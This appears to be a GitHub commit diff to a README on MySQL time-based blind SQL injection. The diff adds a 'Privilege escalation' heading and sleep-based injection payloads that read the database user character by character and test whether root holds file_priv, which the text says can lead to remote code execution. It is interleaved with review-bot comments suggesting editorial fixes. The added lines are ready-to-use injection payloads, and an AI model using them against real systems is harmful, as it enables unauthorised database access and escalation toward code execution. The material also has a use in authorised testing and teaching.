Update README.md
kleiton0x00 authored Sep 4, 2022
1 parent 552c249 commit 4f142ed
Showing 1 changed file with 9 additions and 0 deletions.
9 changes: 9 additions & 0 deletions MySQL - Time Based SQLi/README.md
Expand Up @@ -104,6 +104,8 @@ To search for the third character of the first column, you should increate the f
and if((select mid(column_name,1,1) from table_name limit 2,1)='a',sleep(5),1)--
```

# Privilege escalation

## Finding the db user
Find the first character of the user (if guessed then the request will be 5 seconds delayed):
```sql
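Review bot: The new top-level heading `# Privilege escalation` sits directly above `## Finding the db user`, a section that only reads the current user one character at a time and escalates nothing; a title such as "Privilege enumeration" would describe it more accurately. Also confirm that a single-`#` heading matches the level used for the README's other major sections, since the subsection beneath it is `##`.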
Expand All @@ -114,3 +116,10 @@ Find the second character of the user... and so on:
```sql
and if(substring(user(),2,1)='d',SLEEP(5),1)--
```

## Enumerate user's permission

The following query will show if the user we found from the previous step, has writing permission, which can lead to RCE:
```sql
AND if (MID((SELECT file_priv FROM mysql.user WHERE user = 'root'),1,1) = 'Y', sleep(10), null)--
```
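Review bot: The query hardcodes `user = 'root'` while the sentence above it says it checks "the user we found from the previous step"; use a clearly marked placeholder such as `'<db_user>'` and say it must be replaced. The delay here is `sleep(10)` whereas the earlier section describes a 5-second delay, and the text never states that a delayed response means `file_priv` is `Y`; pick one delay value and spell out how to read the result. The heading would read better as "Enumerate the user's permissions", and "writing permission" should name the column actually tested, `file_priv`.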
